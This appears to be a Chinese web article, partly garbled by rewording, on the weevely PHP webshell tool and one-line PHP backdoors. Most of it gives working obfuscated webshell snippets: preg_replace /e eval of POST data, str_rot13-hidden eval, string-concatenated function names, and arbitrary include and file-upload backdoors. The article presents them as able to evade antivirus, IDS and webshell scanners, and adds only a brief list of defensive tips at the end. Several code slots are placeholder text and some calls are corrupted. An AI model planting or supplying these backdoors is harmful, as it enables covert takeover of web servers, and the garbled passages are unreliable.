PHP侧门生成工具weevely
Weevely是一款PHP webshell的免费软件,可以用来模拟类似于telnet的连接shell。 Weevely一般用于利用Web程序的漏洞,隐藏侧门或者使用类似telnet的形式来代替网页管理。 weevely生成的服务器端php代码是base64编码的,因此可以欺骗主流的杀毒软件和IDS。 上传服务器端代码后一句话木马php,一般可以直接通过weevely运行。
weevely生成的PHP侧门采用的方法是目前主流的base64加密结合字符串修改技术。 侧门中使用的函数都是常用的字符串处理函数,而用作检测规则的eval、system等函数不会直接出现在代码中,这会导致侧门文件绕过侧门查找工具的检测。 使用暗黑组织的网页侧门查杀工具进行扫描,结果显示该文件不存在威胁。
一句话PHP木马的三种变种
第一的
砍刀写入密码为1
第二
在砍刀中写入($_POST['pass']),密码为pass。 如果使用斧头的附加数据,就比较隐蔽,或者可以使用其他注入工具,因为是邮寄提交的。
第三
($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');str_rot13('riny')就是编码后的eval,完全避开了关键字,但是效果还是有的,让人吐血!
最后列出几个中级PHP一句话木马侧门:
1、
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
//菜刀一句话
2、
$filename=$_GET['xbid'];
include ($filename);
//危险的include函数,直接编译任何文件为php格式运行
3、
$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
//重命名任何文件
4、
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");
//菜刀一句话
5、include ($uid);
//危险的include函数,直接编译任何文件为php格式运行,POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif
//gif插一句话
6、典型一句话
程序后门代码
程序代码
//容错代码
程序代码
//使用lanker一句话客户端的专家模式执行相关的php语句
程序代码
程序代码
程序代码
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
程序代码
h=@eval_r($_POST1);
程序代码
@eval_r($_POST[sb])
//绕过<?限制的一句话综上所述,这种PHP一句话侧门可以说是五脏俱全一句话木马php,一不留神就一定中招,而我们明天的文章最重要的是什么? 重点是下面的总结!
PHP一句话侧门如何处理:
我们指出几个关键点。 如果你看了这篇文章,相信你也不是外行,我就不再重复了:
1,对PHP程序编写要有安全意识
2,服务器日志文件要经常看,经常备份
3,对每个站点进行严格的权限分配
4,对动态文件及目录经常批量安全审查
5,学会如何进行手工杀毒《即行为判断查杀》
6,时刻关注,或渗入活跃的网络安全营地
7,对服务器环境层级化处理,哪怕一个函数也可做规则我们认为当需要管理的站点太多、数据量很大时,我们应该合理地使用一些辅助工具,但我们不应该完全依赖这个工具。 技术总是在更新和改进。 最重要的是,你应该去学习、去理解,编译出这种侧门很强的人的思维,角色的换位可以给你带来更大的进步。
